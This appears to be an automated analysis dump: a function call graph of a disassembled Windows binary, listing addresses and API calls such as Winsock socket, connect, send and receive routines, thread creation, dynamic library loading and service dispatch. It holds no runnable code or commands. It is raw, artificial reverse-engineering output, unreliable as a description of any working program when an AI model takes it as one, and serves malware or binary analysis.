2d99d85 __write 79 API calls 20281->20282 20282->20283 20283->20274 20285 2d99d6b 20284->20285 20286 2d99d80 20284->20286 20287 2d95d8b __mbsnbcmp_l 59 API calls 20285->20287 20286->20274 20288 2d99d70 20287->20288 20289 2d94e25 __mbsnbcmp_l 9 API calls 20288->20289 20290 2d99d7b 20289->20290 20290->20274 20292 2d99d91 __commit 20291->20292 20293 2d99d9e 20292->20293 20294 2d99db5 20292->20294 20295 2d95d57 __commit 59 API calls 20293->20295 20296 2d99e54 20294->20296 20298 2d99dc9 20294->20298 20297 2d99da3 20295->20297 20299 2d95d57 __commit 59 API calls 20296->20299 20300 2d95d8b __mbsnbcmp_l 59 API calls 20297->20300 20301 2d99df1 20298->20301 20302 2d99de7 20298->20302 20303 2d99dec 20299->20303 20314 2d99daa __commit 20300->20314 20340 2da0bc7 20301->20340 20304 2d95d57 __commit 59 API calls 20302->20304 20307 2d95d8b __mbsnbcmp_l 59 API calls 20303->20307 20304->20303 20306 2d99df7 20308 2d99e0a 20306->20308 20309 2d99e1d 20306->20309 20310 2d99e60 20307->20310 20349 2d99e74 20308->20349 20313 2d95d8b __mbsnbcmp_l 59 API calls 20309->20313 20312 2d94e25 __mbsnbcmp_l 9 API calls 20310->20312 20312->20314 20316 2d99e22 20313->20316 20314->20274 20315 2d99e16 20408 2d99e4c 20315->20408 20317 2d95d57 __commit 59 API calls 20316->20317 20317->20315 20320 2d99d61 __fflush_nolock 59 API calls 20319->20320 20321 2d95e3f 20320->20321 20322 2d95e4a 20321->20322 20323 2d95e61 20321->20323 20324 2d95d8b __mbsnbcmp_l 59 API calls 20322->20324 20325 2d95e66 20323->20325 20333 2d95e73 __flsbuf 20323->20333 20335 2d95e4f 20324->20335 20326 2d95d8b __mbsnbcmp_l 59 API calls 20325->20326 20326->20335 20327 2d95ecd 20328 2d95f51 20327->20328 20329 2d95ed7 20327->20329 20330 2d99d85 __write 79 API calls 20328->20330 20331 2d95ef1 20329->20331 20336 2d95f08 20329->20336 20330->20335 20332 2d99d85 __write 79 API calls 20331->20332 20332->20335 20333->20327 20334 2d9f6d2 __write_nolock 59 API calls 20333->20334 20333->20335 20337 2d95ec2 20333->20337 20334->20337 20335->20274 20336->20335 20456 2d9f726 20336->20456 20337->20327 20453 2d9f895 20337->20453 20341 2da0bd3 __commit 20340->20341 20342 2da0c22 RtlEnterCriticalSection 20341->20342 20344 2d9881d __lock 59 API calls 20341->20344 20343 2da0c48 __commit 20342->20343 20343->20306 20345 2da0bf8 20344->20345 20346 2da0c10 20345->20346 20347 2d9913c __ioinit InitializeCriticalSectionAndSpinCount 20345->20347 20411 2da0c4c 20346->20411 20347->20346 20350 2d99e81 __write_nolock 20349->20350 20351 2d99edf 20350->20351 20352 2d99ec0 20350->20352 20383 2d99eb5 20350->20383 20355 2d99f1b 20351->20355 20356 2d99f37 20351->20356 20354 2d95d57 __commit 59 API calls 20352->20354 20353 2d9447b __write_nolock 6 API calls 20357 2d9a6d5 20353->20357 20358 2d99ec5 20354->20358 20359 2d95d57 __commit 59 API calls 20355->20359 20361 2d99f50 20356->20361 20415 2d9f822 20356->20415 20357->20315 20360 2d95d8b __mbsnbcmp_l 59 API calls 20358->20360 20362 2d99f20 20359->20362 20363 2d99ecc 20360->20363 20424 2d9f6d2 20361->20424 20366 2d95d8b __mbsnbcmp_l 59 API calls 20362->20366 20367 2d94e25 __mbsnbcmp_l 9 API calls 20363->20367 20369 2d99f27 20366->20369 20367->20383 20368 2d99f5e 20370 2d9a2b7 20368->20370 20374 2d95b8a __write_nolock 59 API calls 20368->20374 20373 2d94e25 __mbsnbcmp_l 9 API calls 20369->20373 20371 2d9a64a WriteFile 20370->20371 20372 2d9a2d5 20370->20372 20375 2d9a2aa GetLastError 20371->20375 20385 2d9a277 20371->20385 20376 2d9a3f9 20372->20376 20382 2d9a2eb 20372->20382 20373->20383 20377 2d99f8a GetConsoleMode 20374->20377 20375->20385 20387 2d9a404 20376->20387 20401 2d9a4ee 20376->20401 20377->20370 20379 2d99fc9 20377->20379 20378 2d9a683 20378->20383 20379->20370 20380 2d99fd9 GetConsoleCP 20379->20380 20380->20378 20381 2d9a35a WriteFile 20381->20375 20381->20382 20382->20378 20382->20381 20382->20385 20383->20353 20385->20378 20385->20383 20386 2d9a3d7 20385->20386 20389 2d9a67a 20386->20389 20390 2d9a3e2 20386->20390 20387->20378 20387->20385 20392 2d9a469 WriteFile 20387->20392 20392->20375 20392->20387 20401->20378 20401->20385 20452 2da0f6d RtlLeaveCriticalSection 20408->20452 20410 2d99e52 20410->20314 20414 2d98987 RtlLeaveCriticalSection 20411->20414 20413 2da0c53 20413->20342 20414->20413 20436 2da0e84 20415->20436 20417 2d9f832 20418 2d9f84b SetFilePointerEx 20417->20418 20419 2d9f83a 20417->20419 20420 2d9f863 GetLastError 20418->20420 20423 2d9f83f 20418->20423 20421 2d95d8b __mbsnbcmp_l 59 API calls 20419->20421 20422 2d95d6a __dosmaperr 59 API calls 20420->20422 20421->20423 20422->20423 20423->20361 20425 2d9f6ea 20424->20425 20426 2d9f6dd 20424->20426 20429 2d9f6f6 20425->20429 20430 2d95d8b __mbsnbcmp_l 59 API calls 20425->20430 20427 2d95d8b __mbsnbcmp_l 59 API calls 20426->20427 20428 2d9f6e2 20427->20428 20428->20368 20429->20368 20431 2d9f717 20430->20431 20432 2d94e25 __mbsnbcmp_l 9 API calls 20431->20432 20432->20428 20437 2da0e8f 20436->20437 20438 2da0ea4 20436->20438 20439 2d95d57 __commit 59 API calls 20437->20439 20440 2d95d57 __commit 59 API calls 20438->20440 20444 2da0ec9 20438->20444 20441 2da0e94 20439->20441 20442 2da0ed3 20440->20442 20443 2d95d8b __mbsnbcmp_l 59 API calls 20441->20443 20445 2d95d8b __mbsnbcmp_l 59 API calls 20442->20445 20447 2da0e9c 20443->20447 20444->20417 20446 2da0edb 20445->20446 20448 2d94e25 __mbsnbcmp_l 9 API calls 20446->20448 20447->20417 20448->20447 20452->20410 20454 2d989e4 __malloc_crt 59 API calls 20453->20454 20455 2d9f8aa 20454->20455 20455->20327 20457 2d9f732 __commit 20456->20457 20458 2d9f75b 20457->20458 20459 2d9f743 20457->20459 20461 2d9f800 20458->20461 20466 2d9f790 20458->20466 20460 2d95d57 __commit 59 API calls 20459->20460 20462 2d9f748 20460->20462 20463 2d95d57 __commit 59 API calls 20461->20463 20464 2d95d8b __mbsnbcmp_l 59 API calls 20462->20464 20465 2d9f805 20463->20465 20474 2d9f750 __commit 20464->20474 20467 2d95d8b __mbsnbcmp_l 59 API calls 20465->20467 20468 2da0bc7 ___lock_fhandle 60 API calls 20466->20468 20469 2d9f80d 20467->20469 20470 2d9f796 20468->20470 20471 2d94e25 __mbsnbcmp_l 9 API calls 20469->20471 20472 2d9f7ac 20470->20472 20473 2d9f7c4 20470->20473 20471->20474 20475 2d9f822 __lseeki64_nolock 61 API calls 20472->20475 20476 2d95d8b __mbsnbcmp_l 59 API calls 20473->20476 20474->20335 20477 2d9f7bb 20475->20477 20478 2d9f7c9 20476->20478 20481 2d9f7f8 20477->20481 20479 2d95d57 __commit 59 API calls 20478->20479 20479->20477 20484 2da0f6d RtlLeaveCriticalSection 20481->20484 20483 2d9f7fe 20483->20474 20484->20483 20486 2d9396b 20485->20486 20487 2d93957 20485->20487 20489 2d93967 20486->20489 20490 2d9a71f __flush 79 API calls 20486->20490 20488 2d95d8b __mbsnbcmp_l 59 API calls 20487->20488 20491 2d9395c 20488->20491 20501 2d93a23 20489->20501 20492 2d93977 20490->20492 20493 2d94e25 __mbsnbcmp_l 9 API calls 20491->20493 20504 2d9b1ce 20492->20504 20493->20489 20496 2d99d61 __fflush_nolock 59 API calls 20497 2d93985 20496->20497 20508 2d9b059 20497->20508 20499 2d9398b 20499->20489 20500 2d92ea4 _free 59 API calls 20499->20500 20500->20489 20502 2d99791 __fsopen 2 API calls 20501->20502 20503 2d93a29 20502->20503 20503->20103 20505 2d9397f 20504->20505 20506 2d9b1db 20504->20506 20505->20496 20506->20505 20507 2d92ea4 _free 59 API calls 20506->20507 20507->20505 20509 2d9b065 __commit 20508->20509 20510 2d9b089 20509->20510 20511 2d9b072 20509->20511 20513 2d9b114 20510->20513 20515 2d9b099 20510->20515 20512 2d95d57 __commit 59 API calls 20511->20512 20514 2d9b077 20512->20514 20516 2d95d57 __commit 59 API calls 20513->20516 20517 2d95d8b __mbsnbcmp_l 59 API calls 20514->20517 20518 2d9b0c1 20515->20518 20519 2d9b0b7 20515->20519 20522 2d9b0bc 20516->20522 20525 2d9b07e __commit 20517->20525 20521 2da0bc7 ___lock_fhandle 60 API calls 20518->20521 20520 2d95d57 __commit 59 API calls 20519->20520 20520->20522 20524 2d9b0c7 20521->20524 20523 2d95d8b __mbsnbcmp_l 59 API calls 20522->20523 20526 2d9b120 20523->20526 20527 2d9b0da 20524->20527 20528 2d9b0e5 20524->20528 20525->20499 20531 2d94e25 __mbsnbcmp_l 9 API calls 20526->20531 20534 2d9b134 20527->20534 20530 2d95d8b __mbsnbcmp_l 59 API calls 20528->20530 20532 2d9b0e0 20530->20532 20531->20525 20549 2d9b10c 20532->20549 20535 2da0e84 __commit 59 API calls 20534->20535 20538 2d9b142 20535->20538 20536 2d9b198 20552 2da0dfe 20536->20552 20538->20536 20539 2d9b176 20538->20539 20542 2da0e84 __commit 59 API calls 20538->20542 20539->20536 20540 2da0e84 __commit 59 API calls 20539->20540 20543 2d9b182 CloseHandle 20540->20543 20545 2d9b16d 20542->20545 20543->20536 20546 2d9b18e GetLastError 20543->20546 20548 2da0e84 __commit 59 API calls 20545->20548 20546->20536 20548->20539 20561 2da0f6d RtlLeaveCriticalSection 20549->20561 20551 2d9b112 20551->20525 20553 2da0e6a 20552->20553 20554 2da0e0a 20552->20554 20555 2d95d8b __mbsnbcmp_l 59 API calls 20553->20555 20554->20553 20559 2da0e33 20554->20559 20556 2da0e6f 20555->20556 20558 2d9b1a0 20559->20558 20560 2da0e55 SetStdHandle 20559->20560 20560->20558 20561->20551 20563 2d927bb 20562->20563 20564 2d95d8b __mbsnbcmp_l 59 API calls 20563->20564 20567 2d927cb _strlen 20563->20567 20565 2d927c0 20564->20565 20566 2d94e25 __mbsnbcmp_l 9 API calls 20565->20566 20566->20567 20567->19943 20569 2d8df3c __EH_prolog 20568->20569 20570 2d93a7c _Allocate 60 API calls 20569->20570 20571 2d8df53 20570->20571 20571->19954 20573 2d90a69 20572->20573 20574 2d8513d 20572->20574 20575 2d932d4 __cinit 68 API calls 20573->20575 20574->19959 20575->20574 20577 2d90a40 Mailbox 68 API calls 20576->20577 20578 2d8a671 20577->20578 20579 2d8519d 20578->20579 20586 2d82db5 20578->20586 20579->19965 20579->19968 20579->19969 20582 2d90a40 Mailbox 68 API calls 20581->20582 20584 2d8ce25 20582->20584 20583 2d8cf34 20583->19965 20584->20583 20613 2d82b95 20584->20613 20587 2d82dca 20586->20587 20588 2d82de4 20586->20588 20589 2d90a40 Mailbox 68 API calls 20587->20589 20590 2d82dfc 20588->20590 20591 2d82def 20588->20591 20594 2d82dcf 20589->20594 20600 2d82d39 WSASetLastError WSASend 20590->20600 20593 2d90a40 Mailbox 68 API calls 20591->20593 20593->20594 20594->20578 20595 2d82e54 WSASetLastError select 20610 2d8a43b 20595->20610 20597 2d82e0c 20597->20594 20597->20595 20598 2d90a40 68 API calls Mailbox 20597->20598 20599 2d82d39 71 API calls 20597->20599 20598->20597 20599->20597 20601 2d8a43b 69 API calls 20600->20601 20602 2d82d6e 20601->20602 20603 2d82d82 20602->20603 20604 2d82d75 20602->20604 20606 2d82d7a 20603->20606 20607 2d90a40 Mailbox 68 API calls 20603->20607 20605 2d90a40 Mailbox 68 API calls 20604->20605 20605->20606 20608 2d90a40 Mailbox 68 API calls 20606->20608 20609 2d82d9c 20606->20609 20607->20606 20608->20609 20609->20597 20611 2d90a40 Mailbox 68 API calls 20610->20611 20612 2d8a447 WSAGetLastError 20611->20612 20612->20597 20614 2d82bb1 20613->20614 20616 2d82bc7 20613->20616 20615 2d90a40 Mailbox 68 API calls 20614->20615 20621 2d82bb6 20615->20621 20617 2d82bd2 20616->20617 20627 2d82bdf 20616->20627 20620 2d90a40 Mailbox 68 API calls 20617->20620 20618 2d82be2 WSASetLastError WSARecv 20619 2d8a43b 69 API calls 20618->20619 20619->20627 20620->20621 20621->20584 20622 2d90a40 68 API calls Mailbox 20622->20627 20623 2d82d22 20628 2d81996 20623->20628 20625 2d82cbc WSASetLastError select 20626 2d8a43b 69 API calls 20625->20626 20626->20627 20627->20618 20627->20621 20627->20622 20627->20623 20627->20625 20629 2d819bb 20628->20629 20630 2d8199f 20628->20630 20629->20621 20631 2d932d4 __cinit 68 API calls 20630->20631 20631->20629 20654 2d8e1b2 20632->20654 20634 2d8d032 20634->19987 20736 2d932e9 20635->20736 20638 2d92044 20638->19989 20639 2d9206d ResumeThread 20639->19989 20640 2d92066 CloseHandle 20640->20639 20642 2d90a40 Mailbox 68 API calls 20641->20642 20643 2d83fb8 20642->20643 20798 2d81815 20643->20798 20646 2d8a5bd 20647 2d8a5c7 __EH_prolog 20646->20647 20804 2d8cb75 20647->20804 20655 2d8e1bc __EH_prolog 20654->20655 20660 2d84030 20655->20660 20659 2d8e1ea 20659->20634 20672 2da5330 20660->20672 20662 2d8403a GetProcessHeap RtlAllocateHeap 20663 2d8407c 20662->20663 20664 2d84053 std::exception::exception 20662->20664 20663->20659 20666 2d8408a 20663->20666 20673 2d8a5fc 20664->20673 20667 2d84094 __EH_prolog 20666->20667 20717 2d8a21b 20667->20717 20672->20662 20674 2d8a606 __EH_prolog 20673->20674 20681 2d8cbab 20674->20681 20679 2d9448a __CxxThrowException@8 RaiseException 20680 2d8a634 20679->20680 20687 2d8d70b 20681->20687 20684 2d8cbc5 20709 2d8d743 20684->20709 20686 2d8a623 20686->20679 20690 2d92443 20687->20690 20693 2d92471 20690->20693 20694 2d8a615 20693->20694 20695 2d9247f 20693->20695 20694->20684 20699 2d92507 20695->20699 20700 2d92484 20699->20700 20701 2d92510 20699->20701 20700->20694 20703 2d924c9 20700->20703 20702 2d92ea4 _free 59 API calls 20701->20702 20702->20700 20704 2d924fa 20703->20704 20705 2d924d5 _strlen 20703->20705 20704->20694 20706 2d92edc _malloc 59 API calls 20705->20706 20707 2d924e7 20706->20707 20707->20704 20708 2d96bec std::exception::_Copy_str 59 API calls 20707->20708 20708->20704 20710 2d8d74d __EH_prolog 20709->20710 20713 2d8b66e 20710->20713 20712 2d8d784 Mailbox 20712->20686 20714 2d8b678 __EH_prolog 20713->20714 20715 2d92443 std::exception::exception 59 API calls 20714->20715 20716 2d8b689 Mailbox 20715->20716 20716->20712 20728 2d8b032 20717->20728 20719 2d840c1 20720 2d83fdc 20719->20720 20735 2da5330 20720->20735 20722 2d83fe6 CreateEventA 20723 2d83ffd 20722->20723 20724 2d8400f 20722->20724 20725 2d83fb0 Mailbox 68 API calls 20723->20725 20724->20659 20726 2d84005 20725->20726 20727 2d8a5bd Mailbox 60 API calls 20726->20727 20727->20724 20729 2d8b05a 20728->20729 20730 2d8b03e 20728->20730 20729->20719 20731 2d93a7c _Allocate 60 API calls 20730->20731 20732 2d8b04e std::exception::exception 20730->20732 20731->20732 20732->20729 20733 2d9448a __CxxThrowException@8 RaiseException 20732->20733 20734 2d8fa63 20733->20734 20735->20722 20737 2d9330b 20736->20737 20738 2d932f7 20736->20738 20740 2d9899c __calloc_crt 59 API calls 20737->20740 20739 2d95d8b __mbsnbcmp_l 59 API calls 20738->20739 20741 2d932fc 20739->20741 20742 2d93318 20740->20742 20743 2d94e25 __mbsnbcmp_l 9 API calls 20741->20743 20744 2d93369 20742->20744 20747 2d95b8a __write_nolock 59 API calls 20742->20747 20746 2d9203b 20743->20746 20745 2d92ea4 _free 59 API calls 20744->20745 20748 2d9336f 20745->20748 20746->20638 20746->20639 20746->20640 20749 2d93325 20747->20749 20748->20746 20752 2d95d6a __dosmaperr 59 API calls 20748->20752 20750 2d95c11 __initptd 59 API calls 20749->20750 20751 2d9332e CreateThread 20750->20751 20751->20746 20754 2d93361 GetLastError 20751->20754 20755 2d93449 20751->20755 20752->20746 20754->20744 20756 2d93452 __threadstartex@4 20755->20756 20757 2d990fb __CRT_INIT@12 TlsGetValue 20756->20757 20758 2d93458 20757->20758 20759 2d9348b 20758->20759 20760 2d9345f __threadstartex@4 20758->20760 20761 2d95a1f __freefls@4 59 API calls 20759->20761 20762 2d9911a __CRT_INIT@12 TlsSetValue 20760->20762 20765 2d934a6 ___crtIsPackagedApp 20761->20765 20763 2d9346e 20762->20763 20766 2d93481 GetCurrentThreadId 20763->20766 20767 2d93474 GetLastError RtlExitUserThread 20763->20767 20764 2d934ba 20777 2d93382 20764->20777 20765->20764 20771 2d933f1 20765->20771 20766->20765 20767->20766 20772 2d933fa LoadLibraryExW GetProcAddress 20771->20772 20773 2d93433 RtlDecodePointer 20771->20773 20774 2d9341d RtlEncodePointer 20772->20774 20775 2d9341c 20772->20775 20776 2d93443 20773->20776 20774->20773 20775->20764 20776->20764 20778 2d9338e __commit 20777->20778 20779 2d95b8a __write_nolock 59 API calls 20778->20779 20780 2d93393 20779->20780 20785 2d933c3 20780->20785 20786 2d95ba2 __getptd_noexit 59 API calls 20785->20786 20787 2d933cc 20786->20787 20788 2d933e7 RtlExitUserThread 20787->20788 20789 2d933e0 20787->20789 20793 2d934c6 20787->20793 20791 2d95b54 __freeptd 59 API calls 20789->20791 20792 2d933e6 20791->20792 20792->20788 20794 2d934cf LoadLibraryExW GetProcAddress 20793->20794 20795 2d93507 RtlDecodePointer 20793->20795 20796 2d934f1 RtlEncodePointer 20794->20796 20797 2d93515 20794->20797 20795->20797 20796->20795 20797->20789 20801 2d92403 20798->20801 20802 2d924c9 std::exception::_Copy_str 59 API calls 20801->20802 20803 2d8182a 20802->20803 20803->20646 20810 2d8d63c 20804->20810 20807 2d8cb8f 20813 2d8b160 20810->20813 20814 2d8b16a __EH_prolog 20813->20814 20815 2d92443 std::exception::exception 59 API calls 20814->20815 20816 2d8b17b 20815->20816 20819 2d87c30 20816->20819 20822 2d8882a 20819->20822 20821 2d87c4f 20821->20807 20823 2d8883f 20822->20823 20824 2d888b3 20822->20824 20826 2d8884c 20823->20826 20827 2d88863 20823->20827 20851 2d8fa92 20824->20851 20834 2d8905d 20826->20834 20844 2d89150 20827->20844 20833 2d88861 _memmove 20833->20821 20835 2d88854 20834->20835 20836 2d89081 20834->20836 20839 2d8908c 20835->20839 20837 2d8fa92 std::bad_exception::bad_exception 60 API calls 20836->20837 20838 2d8908b 20837->20838 20840 2d89103 20839->20840 20843 2d8909d _memmove 20839->20843 20841 2d8fa92 std::bad_exception::bad_exception 60 API calls 20840->20841 20842 2d8910d 20841->20842 20843->20833 20845 2d891a8 20844->20845 20846 2d8915c 20844->20846 20860 2d8fa64 20845->20860 20850 2d8916a std::bad_exception::bad_exception 20846->20850 20856 2d89a0b 20846->20856 20850->20833 20852 2d92403 std::exception::exception 59 API calls 20851->20852 20853 2d8faaa 20852->20853 20854 2d9448a __CxxThrowException@8 RaiseException 20853->20854 20855 2d8fabf 20854->20855 20857 2d89a15 __EH_prolog 20856->20857 20865 2d8abac 20857->20865 20859 2d89a6c _memmove std::bad_exception::bad_exception 20859->20850 20861 2d92403 std::exception::exception 59 API calls 20860->20861 20862 2d8fa7c 20861->20862 20863 2d9448a __CxxThrowException@8 RaiseException 20862->20863 20866 2d8abb8 20865->20866 20867 2d8abcf 20865->20867 20868 2d93a7c _Allocate 60 API calls 20866->20868 20869 2d8abc3 std::exception::exception 20866->20869 20867->20859 20868->20869 20869->20867 20881 2d8a644 GetProcessHeap HeapFree 20880->20881 20881->19999 20883 2d921ab _LocaleUpdate::_LocaleUpdate 59 API calls 20882->20883 20884 2d95ff5 20883->20884 20885 2d95d8b __mbsnbcmp_l 59 API calls 20884->20885 20886 2d95ffa 20885->20886 20887 2d96acb 20886->20887 20890 2d99d61 __fflush_nolock 59 API calls 20886->20890 20905 2d9601a __output_l __aulldvrm _strlen 20886->20905 20888 2d95d8b __mbsnbcmp_l 59 API calls 20887->20888 20889 2d96ad0 20888->20889 20891 2d94e25 __mbsnbcmp_l 9 API calls 20889->20891 20890->20905 20892 2d96aa5 20891->20892 20893 2d9447b __write_nolock 6 API calls 20892->20893 20894 2d923a6 20893->20894 20894->20011 20894->20012 20895 2d9dc3e __isleadbyte_l 59 API calls 20895->20905 20896 2d96b00 79 API calls __output_l 20896->20905 20897 2d96683 RtlDecodePointer 20897->20905 20898 2d96b48 79 API calls _write_multi_char 20898->20905 20899 2d92ea4 _free 59 API calls 20899->20905 20900 2d9fa14 61 API calls __cftof 20900->20905 20901 2d989e4 __malloc_crt 59 API calls 20901->20905 20902 2d966e6 RtlDecodePointer 20902->20905 20903 2d96b74 79 API calls _write_string 20903->20905 20904 2d9670b RtlDecodePointer 20904->20905 20905->20887 20905->20892 20905->20895 20905->20896 20905->20897 20905->20898 20905->20899 20905->20900 20905->20901 20905->20902 20905->20903 20905->20904 20906->20015 20918 2d830ae WSASetLastError 20907->20918 20910 2d830ae 71 API calls 20911 2d83c90 20910->20911 20912 2d816ae 20911->20912 20913 2d816b8 __EH_prolog 20912->20913 20914 2d81701 20913->20914 20915 2d92403 std::exception::exception 59 API calls 20913->20915 20914->19907 20916 2d816dc 20915->20916 20934 2d8a3d4 20916->20934 20919 2d830ec WSAStringToAddressA 20918->20919 20920 2d830ce 20918->20920 20921 2d8a43b 69 API calls 20919->20921 20920->20919 20922 2d830d3 20920->20922 20924 2d83114 20921->20924 20923 2d90a40 Mailbox 68 API calls 20922->20923 20933 2d830d8 20923->20933 20925 2d83154 20924->20925 20931 2d8311e _memcmp 20924->20931 20926 2d83135 20925->20926 20928 2d90a40 Mailbox 68 API calls 20925->20928 20927 2d83193 20926->20927 20929 2d90a40 Mailbox 68 API calls 20926->20929 20932 2d90a40 Mailbox 68 API calls 20927->20932 20927->20933 20928->20926 20929->20927 20930 2d90a40 Mailbox 68 API calls 20930->20926 20931->20926 20931->20930 20932->20933 20933->20910 20933->20911 20935 2d8a3de __EH_prolog 20934->20935 20942 2d8c939 20935->20942 20939 2d8a3ff 20940 2d9448a __CxxThrowException@8 RaiseException 20939->20940 20941 2d8a40d 20940->20941 20943 2d8b160 std::bad_exception::bad_exception 60 API calls 20942->20943 20944 2d8a3f1 20943->20944 20945 2d8c975 20944->20945 20946 2d8c97f __EH_prolog 20945->20946 20949 2d8b10f 20946->20949 20948 2d8c9ae Mailbox 20948->20939 20950 2d8b119 __EH_prolog 20949->20950 20951 2d8b160 std::bad_exception::bad_exception 60 API calls 20950->20951 20952 2d8b12a Mailbox 20951->20952 20952->20948 20954 2d83bdd __EH_prolog 20953->20954 20955 2d83bfe htonl htonl 20954->20955 20965 2d923e7 20954->20965 20955->20034 20960 2d83c20 __EH_prolog 20959->20960 20961 2d83c41 20960->20961 20962 2d923e7 std::bad_exception::bad_exception 59 API calls 20960->20962 20961->20034 20963 2d83c35 20962->20963 20964 2d8a589 60 API calls 20963->20964 20964->20961 20966 2d92403 std::exception::exception 59 API calls 20965->20966 20967 2d83bf2 20966->20967 20968 2d8a589 20967->20968 20969 2d8a593 __EH_prolog 20968->20969 20976 2d8caac 20969->20976 20973 2d8a5ae 20974 2d9448a __CxxThrowException@8 RaiseException 20973->20974 20975 2d8a5bc 20974->20975 20983 2d923cc 20976->20983 20979 2d8cae8 20980 2d8caf2 __EH_prolog 20979->20980 20986 2d8b47e 20980->20986 20982 2d8cb21 Mailbox 20982->20973 20984 2d92443 std::exception::exception 59 API calls 20983->20984 20985 2d8a5a0 20984->20985 20985->20979 20987 2d8b488 __EH_prolog 20986->20987 20988 2d923cc std::bad_exception::bad_exception 59 API calls 20987->20988 20989 2d8b499 Mailbox 20988->20989 20989->20982 21011 2d8353e 20990->21011 20994 2d82ae8 WSASetLastError connect 20993->20994 20995 2d82ad8 20993->20995 20997 2d8a43b 69 API calls 20994->20997 20996 2d90a40 Mailbox 68 API calls 20995->20996 20998 2d82add 20996->20998 20999 2d82b07 20997->20999 21000 2d90a40 Mailbox 68 API calls 20998->21000 20999->20998 21001 2d90a40 Mailbox 68 API calls 20999->21001 21002 2d82b1b 21000->21002 21001->20998 21003 2d90a40 Mailbox 68 API calls 21002->21003 21005 2d82b38 21002->21005 21003->21005 21007 2d82b87 21005->21007 21071 2d83027 21005->21071 21007->20040 21010 2d90a40 Mailbox 68 API calls 21010->21007 21012 2d83548 __EH_prolog 21011->21012 21013 2d83576 21012->21013 21014 2d83557 21012->21014 21033 2d82edd WSASetLastError WSASocketA 21013->21033 21015 2d81996 68 API calls 21014->21015 21031 2d8355f 21015->21031 21018 2d835ad CreateIoCompletionPort 21019 2d835db 21018->21019 21020 2d835c5 GetLastError 21018->21020 21022 2d90a40 Mailbox 68 API calls 21019->21022 21021 2d90a40 Mailbox 68 API calls 21020->21021 21023 2d835d2 21021->21023 21022->21023 21024 2d835ef 21023->21024 21025 2d83626 21023->21025 21026 2d90a40 Mailbox 68 API calls 21024->21026 21059 2d8de25 21025->21059 21027 2d83608 21026->21027 21041 2d829ee 21027->21041 21030 2d83659 21032 2d90a40 Mailbox 68 API calls 21030->21032 21031->20036 21032->21031 21034 2d90a40 Mailbox 68 API calls 21033->21034 21035 2d82f0a WSAGetLastError 21034->21035 21036 2d82f21 21035->21036 21040 2d82f41 21035->21040 21037 2d82f3c 21036->21037 21038 2d82f27 setsockopt 21036->21038 21039 2d90a40 Mailbox 68 API calls 21037->21039 21038->21037 21039->21040 21040->21018 21040->21031 21042 2d82a0c 21041->21042 21043 2d82aad 21041->21043 21044 2d82a39 WSASetLastError closesocket 21042->21044 21048 2d90a40 Mailbox 68 API calls 21042->21048 21045 2d90a40 Mailbox 68 API calls 21043->21045 21047 2d82ab8 21043->21047 21046 2d8a43b 69 API calls 21044->21046 21045->21047 21049 2d82a51 21046->21049 21047->21031 21050 2d82a21 21048->21050 21049->21043 21051 2d90a40 Mailbox 68 API calls 21049->21051 21063 2d82f50 21050->21063 21053 2d82a5c 21051->21053 21055 2d82a7b ioctlsocket WSASetLastError closesocket 21053->21055 21056 2d90a40 Mailbox 68 API calls 21053->21056 21058 2d8a43b 69 API calls 21055->21058 21057 2d82a6e 21056->21057 21057->21043 21057->21055 21058->21043 21060 2d8de2f __EH_prolog 21059->21060 21061 2d93a7c _Allocate 60 API calls 21060->21061 21062 2d8de43 21061->21062 21062->21030 21064 2d82f5b 21063->21064 21065 2d82f70 WSASetLastError setsockopt 21063->21065 21066 2d90a40 Mailbox 68 API calls 21064->21066 21067 2d8a43b 69 API calls 21065->21067 21068 2d82a36 21066->21068 21069 2d82f9e 21067->21069 21068->21044 21069->21068 21070 2d90a40 Mailbox 68 API calls 21069->21070 21070->21068 21072 2d8303b 21071->21072 21073 2d8304d WSASetLastError select 21071->21073 21074 2d90a40 Mailbox 68 API calls 21072->21074 21075 2d8a43b 69 API calls 21073->21075 21078 2d82b59 21074->21078 21076 2d83095 21075->21076 21077 2d90a40 Mailbox 68 API calls 21076->21077 21076->21078 21077->21078 21078->21007 21079 2d82fb4 21078->21079 21080 2d82fc0 21079->21080 21081 2d82fd5 WSASetLastError getsockopt 21079->21081 21083 2d90a40 Mailbox 68 API calls 21080->21083 21082 2d8a43b 69 API calls 21081->21082 21084 2d8300f 21082->21084 21086 2d82b7a 21083->21086 21085 2d90a40 Mailbox 68 API calls 21084->21085 21084->21086 21085->21086 21086->21007 21086->21010 21094 2da5330 21087->21094 21089 2d832b5 RtlEnterCriticalSection 21090 2d90a40 Mailbox 68 API calls 21089->21090 21091 2d832d6 21090->21091 21095 2d83307 21091->21095 21094->21089 21096 2d83311 __EH_prolog 21095->21096 21098 2d83350 21096->21098 21107 2d87db4 21096->21107 21111 2d8239d 21098->21111 21101 2d83390 21117 2d87d5d 21101->21117 21103 2d90a40 Mailbox 68 API calls 21104 2d8337c 21103->21104 21106 2d82d39 71 API calls 21104->21106 21106->21101 21109 2d87dc2 21107->21109 21108 2d87e38 21108->21096 21109->21108 21121 2d88919 21109->21121 21114 2d823ab 21111->21114 21112 2d82417 21112->21101 21112->21103 21113 2d823c1 PostQueuedCompletionStatus 21113->21114 21115 2d823da RtlEnterCriticalSection 21113->21115 21114->21112 21114->21113 21116 2d823f8 InterlockedExchange RtlLeaveCriticalSection 21114->21116 21115->21114 21116->21114 21119 2d87d62 21117->21119 21118 2d832ee RtlLeaveCriticalSection 21118->20055 21119->21118 21132 2d81e7f 21119->21132 21122 2d88943 21121->21122 21123 2d87d5d 68 API calls 21122->21123 21124 2d88989 21123->21124 21125 2d889b0 21124->21125 21127 2d8a1a6 21124->21127 21125->21108 21128 2d8a1c0 21127->21128 21129 2d8a1b0 21127->21129 21128->21125 21129->21128 21130 2d8fa64 std::bad_exception::bad_exception 60 API calls 21129->21130 21131 2d8a21a 21130->21131 21133 2d90a40 Mailbox 68 API calls 21132->21133 21134 2d81e90 21133->21134 21134->21119 21136 2d83770 21135->21136 21137 2d83755 InterlockedCompareExchange 21135->21137 21139 2d90a40 Mailbox 68 API calls 21136->21139 21137->21136 21138 2d83765 21137->21138 21140 2d832ab 78 API calls 21138->21140 21141 2d83779 21139->21141 21140->21136 21142 2d829ee 76 API calls 21141->21142 21143 2d8378e 21142->21143 21143->20064 21144 40223d 21145 40225a 21144->21145 21154 4021de 21144->21154 21146 402261 21145->21146 21147 4022bd 21145->21147 21148 40b176 21146->21148 21149 402277 lstrcmpiW 21146->21149 21150 4022c7 21147->21150 21153 402286 LoadLibraryExA 21147->21153 21151 40b1e6 StartServiceCtrlDispatcherA 21148->21151 21149->21154 21151->21154 21155 40259e 21153->21155 21155->21148 